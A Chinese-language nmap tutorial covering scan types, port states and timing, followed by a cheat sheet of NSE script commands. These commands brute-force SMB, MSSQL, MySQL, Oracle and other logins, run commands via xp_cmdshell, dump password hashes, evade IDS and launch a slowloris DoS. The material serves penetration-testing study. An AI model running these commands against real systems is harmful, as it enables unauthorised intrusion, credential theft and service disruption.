nmap端口扫描技术
nmap端口扫描技术
一、Nmap的扫描方式
发现目标环境中有哪些资产,联网设备、主机、服务器以及各种服务等。
1、主机发现
扫描方式 | 发送报文 | 活跃响应 | 不活跃响应 | 被过滤响应 | 备注 |
---|---|---|---|---|---|
ARP扫描 | ARP请求报文 | ARP响应报文 | 超时 | 不会被过滤 | 精准 |
-sP,ICMP扫描 | ICMPtype=8 code=0type=13 code=0type=17 code=0 | ICMPtype=0 code=0type=14 code=0type=18 code=0 | 超时 | 超时 | 可能会被防火墙过滤 |
端口扫描 | TCP syn | TCP syn+ack | 超时 | 超时或ICMP type=3 code=3或13 | 可能会被过滤 |
ARP扫描是最精准的扫描方式,并且不会被过滤,因此会被强制有限使用。ICMP扫描是最常见的扫描方式,和ping命令原理一致,但现有很多防火墙和IPS设备会禁用ICMP扫描,使得ICMP主机发现失败。端口扫描技术是另一种发现主机的方式,准确且不容易被防火墙过滤,这种方式被经常使用,端口扫描原理见2.2节。
1 | nmap -nP 目标IP #只进行主机探测,不进行端口扫描 |
2、端口扫描技术
端口扫描可以分为TCP端口扫描和UDP端口扫描,由于TCP能够提供更多的协议字段,因此TCP端口扫描更准确,如今的端口扫描技术主要是指TCP端口扫描。
在TCP端口扫描中,探测报文组合不同flags位,不同的flags在端口开放、端口关闭、防火墙过滤时的响应是不一样的,通过区分不同的响应来检测端口的状态,具体如2所示。(tcp flags有syn、ack、rst、fin、psh、urg共6种置位)
-sV 可获得端口对应服务的版本
-O 获得操作系统信息
-oN 保存结果为文本格式
-oX 保存结果为xml格式
扫描方式 | TCP Flag | 开放时响应 | 关闭时响应 | 过滤时响应 | 特征 |
---|---|---|---|---|---|
-sT,TCP全连接扫描 | 报文1:syn报文2:ack | syn+ack,完成3次握手 | rst+ack | 一般不会被过滤 | 精准、费时、可能会被日志记录 |
-sS,TCP半连接扫描 | syn | syn+ack | rst+ack | ICMP type=3 code=3、13或超时 | 精准、快速、无日志记录,最常见且默认的扫描方式 |
-sA,TCP ack扫描 | ack | rst | rst | 不准确、只能判断是否加防火墙filtered或unfiltered | |
-sW,TCP window扫描 | ack | rst,window不为0 | rst,window为0 | 不准确、有的情况下window都为0 | |
-sM,TCP maimon扫描 | fin+ack | 未收到rst | rst | 不准确 | |
-sN隐蔽扫描 | 无置位 | 无响应 | rst | ICMP type=3 code=3或13或超时无响应 | 不准确,只能判断closed和open|filtered |
-sF隐蔽扫描 | fin | 无响应 | rst | ||
-sX隐蔽扫描 | fin+psh+urg | 无响应 | rst | ||
-sU,UDP端口扫描 | 不相关 | 有UDP响应或无响应 | icmp type=3 code=3 | ICMP type=3 code=1,2,9,10,13 | 不准确,通常只能判断closed和open|filtered |
3、其它技术
Nmap还包括操作系统指纹识别技术、服务识别技术、防火墙绕过技术以及NSE(Nmap Scripting Engine)脚本引擎。
二、Nmap的端口状态
nmap对端口进行扫描中,当nmap向目标主机发送报文并根据返回报文从而认定端口的6种状态的含义(注意:这六种状态只是nmap认为的端口状态,例如:有些主机或者防火墙会返回一些不可靠的报文从而妨碍nmap对端口开放问题的确认)。
Open
:端口处于开放状态,例如:当nmap使用TCP SYN对目标主机某一范围的端口进行扫描时,我们知道 TCP SYN报文是TCP建立连接的第一步,所以,如果目标主机返回SYN+ACK的报文,我们就认为此端口开放了并且使用了TCP服务。Closed
:端口处于关闭状态。例如:TCP SYN类型的扫描,如果返回RST类型的报文,则端口处于管理状态。这里我们值得注意的是关闭的端口也是可访问的,只是没有上层的服务在监听这个端口,而且,只是在我们扫描的这个时刻为关闭,当我们在另一个时间段进行扫描的时候,这些关闭的端口可能会处于open的状态。Filtered(过滤的)
:由于报文无法到达指定的端口,nmap不能够决定端口的开放状态,这主要是由于网络或者主机安装了一些防火墙所导致的。当nmap收到icmp报文主机不可达报文(例如:type为3,code为13(communication administratively prohibit)报文)或者目标主机无应答,常常会将目标主机的状态设置为filtered。Unfiltered(未被过滤的)
:当nmap不能确定端口是否开放的时候所打上的状态,这种状态和filtered的区别在于:unfiltered的端口能被nmap访问,但是nmap根据返回的报文无法确定端口的开放状态,而filtered的端口直接就没就没能够被nmap访问。端口被定义为Unfilterd只会发生在TCP ack扫描类型时当返回RST的报文。而端口被定义为filtered 状态的原因是是报文被防火墙设备,路由器规则,或者防火墙软件拦截,无法送达到端口,这通常表现为发送NMAP的主机收到ICMP报错报文,如:TYPE为3,code为13的报文(通信被认为的禁止 communication administratively prohibited),或者主机通过多次重复发送没有收到任何回应)。Open|filtered
状态,这种状态主要是nmap无法区别端口处于open状态还是filtered状态。这种状态只会出现在open端口对报文不做回应的扫描类型中,如:udp,ip protocol ,TCP null,fin,和xmas扫描类型。Closed|filtered
状态,这种状态主要出现在nmap无法区分端口处于closed还是filtered时。此状态只会出现在IP ID idle scan中。
状态 | 说明 |
---|---|
open | 应用程序在该端口接收 TCP 连接或者 UDP 报文 |
closed | 关闭的端口对于nmap也是可访问的, 它接收nmap探测报文并作出响应。但没有应用程序在其上监听 |
filtered | 由于包过滤阻止探测报文到达端口,nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备,路由规则 或者主机上的软件防火墙 |
unfiltered | 未被过滤状态意味着端口可访问,但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态 |
open | filtered | 无法确定端口是开放还是被过滤, 开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃了探测报文或者它引发的任何反应。UDP,IP协议, FIN, Null 等扫描会引起。 |
三、Nmap常用命令
格式:
nmap [ <扫描类型> …] [ <选项> ] { <扫描目标说明> }常用命令
全面扫描:nmap-T4 -p-(1-65535端口) -A targetip
主机发现:nmap-T4 -sn targetip
端口扫描:nmap-T4 targetip
服务扫描:nmap-T4 -sV targetip
操作系统扫描:nmap-T4 -O targetip扫描类型
1
2
3
4
5
6
7
8-sP 只探测主机在线情况
-sS SYN扫描(隐身扫描)
-ST TCP扫描
-sU UDP扫描
-sV 系统版本检测
-O 操作系统识别
–scanflags 指定TCP标识位(设置URG, ACK, PSH,RST,SYN,FIN位)
-F 只扫描常用的100个端口时序选项
1
2
3
4
5
6-T0 偏执的:非常非常慢,用于IDS逃逸
-T1 猥琐的:相当慢,用于IDS逃逸
-T2 有礼貌的:降低速度以消耗更小的带宽,比默认慢十倍
-T3 普通的:默认,根据目标的反应自动调整时间模式
-T4 野蛮的:假定处在一个很好的网络环境,请求可能会淹没目标
-T5 疯狂的:非常野蛮,很可能会淹没目标端口或是漏掉一些开放端口
四、Nmap脚本使用
脚本升级:nmap –script-updatedb; 脚本目录:/usr/share/nmap/scripts
脚本命令参数
1 | -sC 等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别 |
脚本分类
1 | auth 负责处理鉴权证书(绕开鉴权)绕过目标主机得访问控制的脚本 |
按脚本分类扫描
1 | # 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 |
按应用服务扫描
vnc扫描:
检查vnc bypass
nmap –script=realvnc-auth-bypass 192.168.137.4
检查vnc认证方式
nmap –script=vnc-auth 192.168.137.4
获取vnc信息
nmap –script=vnc-info 192.168.137.4
smb扫描:
smb破解
nmap –script=smb-brute.nse -p445 192.168.137.4
smb字典破解
nmap –script=smb-brute.nse –script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
smb已知几个严重漏
nmap –script=smb-check-vulns.nse –script-args=unsafe=1 192.168.137.4
查看共享目录
nmap -p 445 –script smb-ls –script-args ‘share=e$,path=,smbuser=test,smbpass=test’ 192.168.137.4
smb-psexec: 用登陆凭据作为脚本参数,在目标机器上运行一系列程序(注:需要下载nmap_service)
nmap –script smb-psexec.nse –script-args=smbuser=,smbpass=[,config=] -p445
查看会话
nmap -n -p445 –script=smb-enum-sessions.nse –script-args=smbuser=test,smbpass=test 192.168.137.4
系统信息
nmap -n -p445 –script=smb-os-discovery.nse –script-args=smbuser=test,smbpass=test 192.168.137.4
Mssql扫描:
猜解mssql用户名和密码
nmap -p1433 –script=ms-sql-brute –script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
xp_cmdshell 执行命令
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=”net user” 192.168.137.4
dumphash值
nmap -p 1433 –script ms-sql-dump-hashes.nse –script-args mssql.username=sa,mssql.password=sa 192.168.137.4
Mysql扫描:
检查mysql空密码
nmap -p 3306 –script=mysql-empty-password.nse 192.168.1.114
如果没有空密码,则可以使用自带的暴力破解功能尝试破解
nmap -p 3306 –script=mysql-brute.nse 192.168.1.114
如果知道了用户名与密码,可以枚举数据库中的用户
nmap -p 3306 –script=mysql-users.nse –script-args=mysqluser=root 192.168.1.114
枚举mysql用户信息
nmap -p 3306 –script=mysql-enum.nse 192.168.1.114
支持同一应用的所有脚本扫描
nmap –script=mysql-* 192.168.137.4
Oracle扫描:
oracle sid扫描
nmap –script=oracle-sid-brute -p 1521-1560 192.168.137.5
oracle弱口令破解
nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5
其他一些比较好用的脚本
nmap –script=broadcast-netbios-master-browser 192.168.137.4
发现网关
nmap -p 873 –script rsync-brute –script-args ‘rsync-brute.module=www’ 192.168.137.4破解rsync
nmap –script informix-brute -p 9088 192.168.137.4informix数据库破解
nmap -p 5432 –script pgsql-brute 192.168.137.4pgsql破解
nmap -sU –script snmp-brute 192.168.137.4snmp破解
nmap -sV –script=telnet-brute 192.168.137.4telnet破解
nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’jboss autopwn
nmap –script=http-methods.nse 192.168.137.4检查http方法
nmap –script http-slowloris –max-parallelism 400 192.168.137.4dos攻击
,对于处理能力较小的站点还挺好用的 ‘half-HTTP’ connections
nmap –script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4不靠谱的脚本:
vnc-brute 次数多了会禁止连接
pcanywhere-brute 同上